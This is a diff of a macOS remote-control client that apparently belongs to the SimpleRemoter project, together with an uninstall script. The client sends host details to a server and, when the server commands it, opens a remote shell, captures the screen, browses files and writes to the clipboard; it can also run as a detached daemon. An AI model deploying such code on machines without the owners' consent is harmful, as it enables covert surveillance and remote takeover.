info.dwCPUMHz = getCPUFrequencyMHz(); info.dwCPUMHz = getCPUFrequencyMHz();
// PC Name (hostname) // PC Name (hostname) - with group name if set
std::string hostname = getHostname(); std::string hostname = getHostname();
strncpy(info.szPCName, hostname.c_str(), sizeof(info.szPCName) - 1); std::string groupName = loadGroupName();
if (!groupName.empty()) {
// Also update g_SETTINGS for consistency
strncpy(g_SETTINGS.szGroupName, groupName.c_str(), sizeof(g_SETTINGS.szGroupName) - 1);
g_SETTINGS.szGroupName[sizeof(g_SETTINGS.szGroupName) - 1] = '\0';
// Format: "hostname/groupname"
std::string pcNameWithGroup = hostname + "/" + groupName;
strncpy(info.szPCName, pcNameWithGroup.c_str(), sizeof(info.szPCName) - 1);
} else if (g_SETTINGS.szGroupName[0] != 0) {
// Use group from g_SETTINGS (set at build time)
groupName = g_SETTINGS.szGroupName;
std::string pcNameWithGroup = hostname + "/" + groupName;
strncpy(info.szPCName, pcNameWithGroup.c_str(), sizeof(info.szPCName) - 1);
} else {
strncpy(info.szPCName, hostname.c_str(), sizeof(info.szPCName) - 1);
}
info.szPCName[sizeof(info.szPCName) - 1] = '\0';
// Webcam // Webcam
info.bWebCamIsExist = hasCameraDevice() ? 1 : 0; info.bWebCamIsExist = hasCameraDevice() ? 1 : 0;
@@ -325,28 +569,50 @@ static void fillLoginInfo(LOGIN_INFOR& info)
std::string resolution = getScreenResolution(); std::string resolution = getScreenResolution();
info.AddReserved(resolution.c_str()); info.AddReserved(resolution.c_str());
// 17. Client ID (calculated from system info, same algorithm as server) // 17. Client ID
// Format: pubIP|hostname|os|cpu|path // V2 算法IOPlatformUUID + 归一化路径
char cpuStr[32]; // - 同机同程序路径永远同 ID不依赖 IP/hostname/os/CPU 漂移)
snprintf(cpuStr, sizeof(cpuStr), "%uMHz", info.dwCPUMHz); // - IOPlatformUUID 主板级,重装系统通常不变;多机各不相同
std::string idInput = (pubIP.empty() ? "?" : pubIP) + "|" + // - 读取失败时退化到老算法pubIP|hostname|os|cpu|path保兼容
hostname + "|" + std::string machineId = getMachineId();
osVer + "|" + if (!machineId.empty()) {
cpuStr + "|" + std::string normPath = normalizeExePathLower(exePath);
exePath; std::string idInput = machineId + "|" + normPath;
g_myClientID = XXH64(idInput.c_str(), idInput.length(), 0); g_myClientID = XXH64(idInput.c_str(), idInput.length(), 0);
NSLog(@"ClientID(v2): %llu (machineId=%s, path=%s)",
g_myClientID, machineId.c_str(), normPath.c_str());
} else {
// 老算法兜底
char cpuStr[32];
snprintf(cpuStr, sizeof(cpuStr), "%uMHz", info.dwCPUMHz);
std::string idInput = (pubIP.empty() ? "?" : pubIP) + "|" +
hostname + "|" +
osVer + "|" +
cpuStr + "|" +
exePath;
g_myClientID = XXH64(idInput.c_str(), idInput.length(), 0);
NSLog(@"ClientID(v1 fallback): %llu (IOPlatformUUID 读取失败)", g_myClientID);
}
info.AddReserved(std::to_string(g_myClientID).c_str()); info.AddReserved(std::to_string(g_myClientID).c_str());
// 服务端签名输入:与服务端 AddList 处签名格式一致startTime + "|" + clientID
ClientAuth::g_loginMsg = std::string(info.szStartTime) + "|" + std::to_string(g_myClientID);
NSLog(@"LOGIN_INFOR filled: OS=%s, Host=%s, CPU=%dMHz, PubIP=%s, ClientID=%llu", NSLog(@"LOGIN_INFOR filled: OS=%s, Host=%s, CPU=%dMHz, PubIP=%s, ClientID=%llu",
osVer.c_str(), hostname.c_str(), info.dwCPUMHz, pubIP.c_str(), g_myClientID); osVer.c_str(), hostname.c_str(), info.dwCPUMHz, pubIP.c_str(), g_myClientID);
} }
// ============== Signal Handling ============== // ============== Signal Handling ==============
// 注意signal handler 内不能调 NSLog/MprintfNSLog 走 Foundation 锁,
// Mprintf 走 Logger mutex/condvar都不是 async-signal-safe。只在这里
// 记 sig_atomic_t 标志位main 退出循环后再补一行日志。
static volatile sig_atomic_t g_lastSignal = 0;
static void signalHandler(int sig) static void signalHandler(int sig)
{ {
NSLog(@"Received signal %d, shutting down...", sig); g_lastSignal = sig;
g_running = false; g_running = false;
g_bExit = S_CLIENT_EXIT; // 通知所有工作线程退出
} }
static void setupSignals() static void setupSignals()
@@ -357,67 +623,74 @@ static void setupSignals()
signal(SIGPIPE, SIG_IGN); signal(SIGPIPE, SIG_IGN);
} }
// ============== Main Entry Point ============== // 经典 Unix 双 fork 守护进程
static void daemonize()
// RTT 估算器(参考 RFC 6298 算法,与 Windows 端 KernelManager 一致)
struct RttEstimator {
double srtt = 0.0; // 平滑 RTT (秒)
double rttvar = 0.0; // RTT 波动 (秒)
double rto = 0.0; // 超时时间 (秒)
bool initialized = false;
void update_from_sample(double rtt_ms)
{
// 过滤异常值RTT应在合理范围内 (0, 30000] 毫秒
if (rtt_ms <= 0 || rtt_ms > 30000)
return;
const double alpha = 1.0 / 8;
const double beta = 1.0 / 4;
double rtt = rtt_ms / 1000.0;
if (!initialized) {
srtt = rtt;
rttvar = rtt / 2.0;
rto = srtt + 4.0 * rttvar;
initialized = true;
} else {
rttvar = (1.0 - beta) * rttvar + beta * std::fabs(srtt - rtt);
srtt = (1.0 - alpha) * srtt + alpha * rtt;
rto = srtt + 4.0 * rttvar;
}
// 限制最小 RTORFC 6298 推荐 1 秒)
if (rto < 1.0) rto = 1.0;
}
};
RttEstimator g_rttEstimator;
int g_heartbeatInterval = 5; // 心跳间隔(秒),默认 5 秒,后续可由服务端动态调整
void* ScreenworkingThread(void* param)
{ {
try { pid_t pid = fork();
std::unique_ptr<IOCPClient> ClientObject(new IOCPClient(g_bExit, true)); if (pid < 0) exit(1);
void* clientAddr = ClientObject.get(); if (pid > 0) exit(0); // 父进程退出
Mprintf(">>> Enter ScreenworkingThread [%p]\n", clientAddr);
if (!g_bExit && ClientObject->ConnectServer(g_SETTINGS.ServerIP(), g_SETTINGS.ServerPort())) { setsid(); // 新会话,脱离终端
std::unique_ptr<ScreenHandler> handler(new ScreenHandler(ClientObject.get()));
if (!handler->init()) { pid = fork(); // 第二次 fork防止重新获取控制终端
if (pid < 0) exit(1);
if (pid > 0) exit(0);
// 关闭标准文件描述符,重定向到 /dev/null
close(STDIN_FILENO);
close(STDOUT_FILENO);
close(STDERR_FILENO);
open("/dev/null", O_RDONLY); // fd 0 = stdin
open("/dev/null", O_WRONLY); // fd 1 = stdout
open("/dev/null", O_WRONLY); // fd 2 = stderr
}
// ============== Main Entry Point ==============
// RttEstimator + g_rttEstimator + g_heartbeatInterval 已抽到 common/rtt_estimator.h
void* ShellworkingThread(void* /*param*/)
{
RunSubConnThread<PTYHandler>(
"ShellworkingThread",
[](IOCPClient* c) { return std::unique_ptr<PTYHandler>(new PTYHandler(c)); },
[](IOCPClient* c, PTYHandler*) {
BYTE bToken = TOKEN_TERMINAL_START;
c->Send2Server((char*)&bToken, 1);
Mprintf(">>> ShellworkingThread [%p] Send: TOKEN_TERMINAL_START\n", c);
});
return NULL;
}
void* ScreenworkingThread(void* /*param*/)
{
RunSubConnThread<ScreenHandler>(
"ScreenworkingThread",
[](IOCPClient* c) -> std::unique_ptr<ScreenHandler> {
// macOS ScreenHandler 需要先 init() 申请录屏权限/抓屏 stream失败 → 返 nullptr
// 让骨架直接 leave跳过 callback 安装
auto h = std::unique_ptr<ScreenHandler>(new ScreenHandler(c));
if (!h->init()) {
Mprintf("*** ScreenHandler initialization failed (no permission?) ***\n"); Mprintf("*** ScreenHandler initialization failed (no permission?) ***\n");
return NULL; return nullptr;
} }
ClientObject->setManagerCallBack(handler.get(), IOCPManager::DataProcess, IOCPManager::ReconnectProcess); return h;
},
[](IOCPClient* c, ScreenHandler* h) {
// 连接后立即发送完整的 BITMAPINFO 包(与 Windows 端 ScreenManager 流程一致) // 连接后立即发送完整的 BITMAPINFO 包(与 Windows 端 ScreenManager 流程一致)
handler->sendBitmapInfo(); h->sendBitmapInfo();
Mprintf(">>> ScreenworkingThread [%p] Send: TOKEN_BITMAPINFO\n", clientAddr); Mprintf(">>> ScreenworkingThread [%p] Send: TOKEN_BITMAPINFO\n", c);
while (ClientObject->IsRunning() && ClientObject->IsConnected() && S_CLIENT_NORMAL == g_bExit) });
Sleep(1000); return NULL;
} }
Mprintf(">>> Leave ScreenworkingThread [%p]\n", clientAddr);
} catch (const std::exception& e) { void* FileManagerworkingThread(void* /*param*/)
Mprintf("*** ScreenworkingThread exception: %s ***\n", e.what()); {
} RunSubConnThread<FileManager>(
"FileManagerworkingThread",
[](IOCPClient* c) { return std::unique_ptr<FileManager>(new FileManager(c)); },
[](IOCPClient* c, FileManager*) {
Mprintf(">>> FileManagerworkingThread [%p] initialized\n", c);
});
return NULL; return NULL;
} }
@@ -426,11 +699,18 @@ int DataProcess(void* user, PBYTE szBuffer, ULONG ulLength)
if (szBuffer == nullptr || ulLength == 0) if (szBuffer == nullptr || ulLength == 0)
return TRUE; return TRUE;
// 服务端身份未通过校验前,仅放行 CMD_MASTERSETTING校验本身。详见
// common/client_auth_state.h ClientAuth::IsCommandAllowed 的注释。
if (!ClientAuth::IsCommandAllowed(szBuffer[0])) {
return TRUE;
}
if (szBuffer[0] == COMMAND_BYE) { if (szBuffer[0] == COMMAND_BYE) {
Mprintf("*** [%p] Received Bye-Bye command ***\n", user); Mprintf("*** [%p] Received Bye-Bye command ***\n", user);
g_bExit = S_CLIENT_EXIT; g_bExit = S_CLIENT_EXIT;
g_running = false; // Stop main loop to prevent reconnection g_running = false; // Stop main loop to prevent reconnection
} else if (szBuffer[0] == COMMAND_SHELL) { } else if (szBuffer[0] == COMMAND_SHELL) {
std::thread(ShellworkingThread, nullptr).detach();
Mprintf("** [%p] Received 'SHELL' command ***\n", user); Mprintf("** [%p] Received 'SHELL' command ***\n", user);
} else if (szBuffer[0] == COMMAND_SCREEN_SPY) { } else if (szBuffer[0] == COMMAND_SCREEN_SPY) {
std::thread(ScreenworkingThread, nullptr).detach(); std::thread(ScreenworkingThread, nullptr).detach();
@@ -438,7 +718,34 @@ int DataProcess(void* user, PBYTE szBuffer, ULONG ulLength)
} else if (szBuffer[0] == COMMAND_SYSTEM) { } else if (szBuffer[0] == COMMAND_SYSTEM) {
Mprintf("** [%p] Received 'SYSTEM' command ***\n", user); Mprintf("** [%p] Received 'SYSTEM' command ***\n", user);
} else if (szBuffer[0] == COMMAND_LIST_DRIVE) { } else if (szBuffer[0] == COMMAND_LIST_DRIVE) {
std::thread(FileManagerworkingThread, nullptr).detach();
Mprintf("** [%p] Received 'LIST_DRIVE' command ***\n", user); Mprintf("** [%p] Received 'LIST_DRIVE' command ***\n", user);
} else if (szBuffer[0] == COMMAND_C2C_PREPARE) {
// C2C 准备接收通知
FileTransferV2::HandleC2CPrepare(szBuffer, ulLength, nullptr);
Mprintf("** [%p] C2C Prepare received ***\n", user);
} else if (szBuffer[0] == COMMAND_C2C_TEXT) {
// C2C 文本剪贴板: [cmd:1][dstClientID:8][textLen:4][text:N]
if (ulLength >= 13) {
uint32_t textLen;
memcpy(&textLen, szBuffer + 9, 4);
if (ulLength >= 13 + textLen && textLen > 0) {
if (!ClipboardHandler::IsAvailable()) {
Mprintf("** [%p] C2C Text: clipboard unavailable ***\n", user);
} else {
std::string utf8Text((const char*)szBuffer + 13, textLen);
if (ClipboardHandler::SetText(utf8Text)) {
Mprintf("** [%p] C2C Text received: %u bytes ***\n", user, textLen);
}
}
}
}
} else if (szBuffer[0] == COMMAND_SEND_FILE_V2 || szBuffer[0] == COMMAND_FILE_COMPLETE_V2) {
// V2 文件接收
int result = FileTransferV2::RecvFileChunkV2(szBuffer, ulLength, g_myClientID);
if (result != 0) {
Mprintf("** [%p] V2 File recv error: %d ***\n", user, result);
}
} else if (szBuffer[0] == CMD_HEARTBEAT_ACK) { } else if (szBuffer[0] == CMD_HEARTBEAT_ACK) {
if (ulLength >= 1 + sizeof(HeartbeatACK)) { if (ulLength >= 1 + sizeof(HeartbeatACK)) {
HeartbeatACK* ack = (HeartbeatACK*)(szBuffer + 1); HeartbeatACK* ack = (HeartbeatACK*)(szBuffer + 1);
@@ -454,43 +761,108 @@ int DataProcess(void* user, PBYTE szBuffer, ULONG ulLength)
} }
} }
} else if (szBuffer[0] == CMD_MASTERSETTING) { } else if (szBuffer[0] == CMD_MASTERSETTING) {
int settingSize = ulLength - 1; MasterSettings settings;
if (settingSize >= (int)sizeof(int)) { // 至少包含 ReportInterval if (!ClientAuth::HandleMasterSettings(szBuffer + 1, (int)ulLength - 1, &settings)) {
MasterSettings settings = {}; return TRUE; // 包不全或签名失败:让 30s 超时兜底重连
memcpy(&settings, szBuffer + 1, settingSize < (int)sizeof(MasterSettings) ? settingSize : sizeof(MasterSettings));
if (settings.ReportInterval > 0)
g_heartbeatInterval = settings.ReportInterval;
Mprintf("** [%p] MasterSettings: ReportInterval=%ds ***\n", user, g_heartbeatInterval);
} }
if (settings.ReportInterval > 0)
g_heartbeatInterval = settings.ReportInterval;
Mprintf("** [%p] MasterSettings: ReportInterval=%ds ***\n", user, g_heartbeatInterval);
} else if (szBuffer[0] == COMMAND_NEXT) { } else if (szBuffer[0] == COMMAND_NEXT) {
Mprintf("** [%p] Received 'NEXT' command ***\n", user); Mprintf("** [%p] Received 'NEXT' command ***\n", user);
} else if (szBuffer[0] == CMD_SET_GROUP) {
// Extract group name from message (starts at byte 1)
std::string groupName;
if (ulLength > 1) {
groupName = std::string((char*)szBuffer + 1, ulLength - 1);
// Remove trailing nulls
size_t pos = groupName.find('\0');
if (pos != std::string::npos) {
groupName = groupName.substr(0, pos);
}
}
// Save to config file
saveGroupName(groupName);
// Update global settings
memset(g_SETTINGS.szGroupName, 0, sizeof(g_SETTINGS.szGroupName));
strncpy(g_SETTINGS.szGroupName, groupName.c_str(), sizeof(g_SETTINGS.szGroupName) - 1);
// 标记需要重发登录信息(让服务端更新分组显示)
g_needResendLogin.store(true);
Mprintf("** [%p] Group changed to: %s ***\n", user, groupName.c_str());
} else { } else {
Mprintf("** [%p] Received unimplemented command: %d ***\n", user, int(szBuffer[0])); Mprintf("** [%p] Received unimplemented command: %d ***\n", user, int(szBuffer[0]));
} }
return TRUE; return TRUE;
} }
// 用法: ./ghost [-d]
// -d 后台守护进程模式
int main(int argc, const char* argv[]) int main(int argc, const char* argv[])
{ {
(void)argc; // 解析 -d 参数
(void)argv; bool daemon_mode = (argc > 1 && strcmp(argv[1], "-d") == 0);
// 守护进程模式:在进入 autoreleasepool 之前 fork
if (daemon_mode) {
daemonize();
}
@autoreleasepool { @autoreleasepool {
NSLog(@"=== macOS Ghost Client ==="); NSLog(@"=== macOS Ghost Client%s ===", daemon_mode ? " (daemon)" : "");
// ============== Power Management: Keep System Awake ==============
// 1. Disable App Nap - prevent macOS from suspending this process
id<NSObject> powerActivity = [[NSProcessInfo processInfo]
beginActivityWithOptions:(NSActivityUserInitiated | NSActivityIdleSystemSleepDisabled)
reason:@"Remote control client must maintain persistent connection"];
NSLog(@"App Nap disabled, activity token acquired");
// 2. Prevent system idle sleep using IOKit power assertion
IOPMAssertionID sleepAssertionID = 0;
IOReturn result = IOPMAssertionCreateWithName(
kIOPMAssertionTypeNoIdleSleep,
kIOPMAssertionLevelOn,
CFSTR("SimpleRemoter macOS client - maintaining remote connection"),
&sleepAssertionID
);
if (result == kIOReturnSuccess) {
NSLog(@"Power assertion created: system idle sleep disabled (ID: %u)", sleepAssertionID);
} else {
NSLog(@"Warning: Failed to create power assertion (error: 0x%x)", result);
}
// 3. Display sleep: managed by ScreenHandler - only prevents display sleep
// when remote desktop is actively connected (saves power when idle)
// Setup signal handlers // Setup signal handlers
setupSignals(); setupSignals();
// Load configuration file (~/.config/ghost/config.conf)
loadConfig();
NSLog(@"Config loaded from %s", g_configPath.c_str());
// Check permissions // Check permissions
NSLog(@"Checking permissions..."); NSLog(@"Checking permissions...");
if (!Permissions::checkScreenCapture()) { bool hasScreenCapture = Permissions::checkScreenCapture();
if (hasScreenCapture) {
NSLog(@"Screen capture permission: OK");
} else {
NSLog(@"Screen capture permission not granted."); NSLog(@"Screen capture permission not granted.");
NSLog(@"Please grant permission in System Preferences > Privacy & Security > Screen Recording"); NSLog(@"Please grant permission in System Preferences > Privacy & Security > Screen Recording");
Permissions::openScreenCaptureSettings(); // Request permission (triggers system dialog on first run)
Permissions::requestScreenCapture();
// Only open settings if this appears to be a re-run without permission
// Check again after request (dialog may have been shown)
if (!Permissions::checkScreenCapture()) {
Permissions::openScreenCaptureSettings();
}
} }
if (!Permissions::checkAccessibility()) { bool hasAccessibility = Permissions::checkAccessibility();
if (hasAccessibility) {
NSLog(@"Accessibility permission: OK");
} else {
NSLog(@"Accessibility permission not granted."); NSLog(@"Accessibility permission not granted.");
NSLog(@"Please grant permission in System Preferences > Privacy & Security > Accessibility"); NSLog(@"Please grant permission in System Preferences > Privacy & Security > Accessibility");
Permissions::requestAccessibility(); Permissions::requestAccessibility();
@@ -501,6 +873,8 @@ int main(int argc, const char* argv[])
NSLog(@"Full Disk Access: not detected (may be false negative)."); NSLog(@"Full Disk Access: not detected (may be false negative).");
NSLog(@"If file access issues occur, grant FDA in System Preferences > Privacy & Security > Full Disk Access"); NSLog(@"If file access issues occur, grant FDA in System Preferences > Privacy & Security > Full Disk Access");
// Don't auto-open settings since detection is unreliable // Don't auto-open settings since detection is unreliable
} else {
NSLog(@"Full Disk Access: OK");
} }
// Create client // Create client
@@ -519,10 +893,19 @@ int main(int argc, const char* argv[])
continue; continue;
} }
// 进入新连接,重置服务端身份校验状态
ClientAuth::OnNewConnection();
ClientObject->SendLoginInfo(logInfo.Speed(clock() - c)); ClientObject->SendLoginInfo(logInfo.Speed(clock() - c));
// 心跳保活循环:定时发送心跳包,服务端回复后动态更新 RTT // 心跳保活循环:定时发送心跳包,服务端回复后动态更新 RTT
while (ClientObject->IsRunning() && ClientObject->IsConnected() && S_CLIENT_NORMAL == g_bExit) { while (ClientObject->IsRunning() && ClientObject->IsConnected() && S_CLIENT_NORMAL == g_bExit) {
// 检查是否需要重发登录信息(分组变更后)
if (g_needResendLogin.exchange(false)) {
fillLoginInfo(logInfo);
ClientObject->SendLoginInfo(logInfo);
Mprintf(">> Resent login info after group change\n");
}
// 等待心跳间隔(每秒检查一次退出条件,保证及时响应) // 等待心跳间隔(每秒检查一次退出条件,保证及时响应)
int interval = g_heartbeatInterval > 0 ? g_heartbeatInterval : 30; int interval = g_heartbeatInterval > 0 ? g_heartbeatInterval : 30;
for (int i = 0; i < interval; ++i) { for (int i = 0; i < interval; ++i) {
@@ -533,6 +916,13 @@ int main(int argc, const char* argv[])
if (!ClientObject->IsRunning() || !ClientObject->IsConnected() || g_bExit != S_CLIENT_NORMAL) if (!ClientObject->IsRunning() || !ClientObject->IsConnected() || g_bExit != S_CLIENT_NORMAL)
break; break;
// 30 秒内未通过 MasterSettings 校验 → 断开本连接让外层重连,
// 永不退出进程(详见 ClientAuth::IsTimedOut 注释)。
if (ClientAuth::IsTimedOut()) {
ClientObject->Disconnect();
break;
}
// 构造并发送心跳包(与 Windows 端 KernelManager::SendHeartbeat 格式一致) // 构造并发送心跳包(与 Windows 端 KernelManager::SendHeartbeat 格式一致)
std::string activity = getActiveApp(); std::string activity = getActiveApp();
@@ -548,7 +938,28 @@ int main(int argc, const char* argv[])
} }
} }
// 退出原因留痕signal handler 不能直接打日志,在这里补一行。
if (g_lastSignal != 0) {
Mprintf(">>> Exit by signal %d (g_bExit=%d)\n",
(int)g_lastSignal, (int)g_bExit);
} else {
Mprintf(">>> Exit normally (g_bExit=%d)\n", (int)g_bExit);
}
NSLog(@"Shutting down..."); NSLog(@"Shutting down...");
// Release power assertions
if (sleepAssertionID) {
IOPMAssertionRelease(sleepAssertionID);
NSLog(@"Released sleep assertion");
}
// Display assertion is managed by ScreenHandler (released in stop())
// powerActivity is automatically released when exiting @autoreleasepool
(void)powerActivity; // Suppress unused variable warning
// 显式停止日志,确保上面 Mprintf 的退出原因落盘。
// 不依赖 ~Logger() 的静态析构次序,避免后续新增日志相关静态对象时踩坑。
Logger::getInstance().stop();
} }
return 0; return 0;

32
macos/uninstall.sh Normal file
View File

@@ -0,0 +1,32 @@
#!/bin/bash
# macOS Ghost Client 卸载脚本
APP_DIR="/Applications/GhostClient.app"
echo "=== GhostClient 卸载程序 ==="
echo ""
# 1. 停止进程
echo "[1/4] 停止进程..."
pkill -9 -f "$APP_DIR" 2>/dev/null || true
# 2. 删除文件
echo "[2/4] 删除文件..."
sudo rm -rf "$APP_DIR"
rm -rf ~/.config/ghost 2>/dev/null || true
rm -f /tmp/ghost.log 2>/dev/null || true
# 3. 移除登录项
echo "[3/4] 移除登录项..."
osascript -e 'tell application "System Events" to delete login item "GhostClient"' 2>/dev/null || true
# 4. 重置系统权限
echo "[4/4] 重置系统权限..."
tccutil reset ScreenCapture 2>/dev/null || true
tccutil reset Accessibility 2>/dev/null || true
echo ""
echo "========================================"
echo " 卸载完成"
echo "========================================"
echo ""

9
server/2015Remote/2015Remote.cpp
View File

@@ -526,14 +526,13 @@ BOOL CMy2015RemoteApp::InitInstance()
SetChineseThreadLocale(); SetChineseThreadLocale();
// 加载语言包(必须在显示任何文本之前) // 加载语言包(必须在显示任何文本之前)
// 内嵌资源支持 en_US 和 zh_TW无需外部文件
auto lang = THIS_CFG.GetStr("settings", "Language", "en_US"); auto lang = THIS_CFG.GetStr("settings", "Language", "en_US");
auto langDir = THIS_CFG.GetStr("settings", "LangDir", "./lang"); auto langDir = THIS_CFG.GetStr("settings", "LangDir", "./lang");
langDir = langDir.empty() ? "./lang" : langDir; langDir = langDir.empty() ? "./lang" : langDir;
if (PathFileExists(langDir.c_str())) { g_Lang.Init(langDir.c_str()); // 初始化目录(用于磁盘补丁文件)
g_Lang.Init(langDir.c_str()); g_Lang.Load(lang.c_str()); // 加载语言(优先内嵌资源,再覆盖磁盘文件)
g_Lang.Load(lang.c_str()); Mprintf("语言: %s, 目录: %s\n", lang.c_str(), langDir.c_str());
Mprintf("语言包目录已经指定[%s], 语言数量: %d\n", langDir.c_str(), g_Lang.GetLanguageCount());
}
// 创建并显示启动画面 // 创建并显示启动画面
CSplashDlg* pSplash = new CSplashDlg(); CSplashDlg* pSplash = new CSplashDlg();

BIN
server/2015Remote/2015Remote.rc
View File

Binary file not shown.

Some files were not shown because too many files have changed in this diff Show More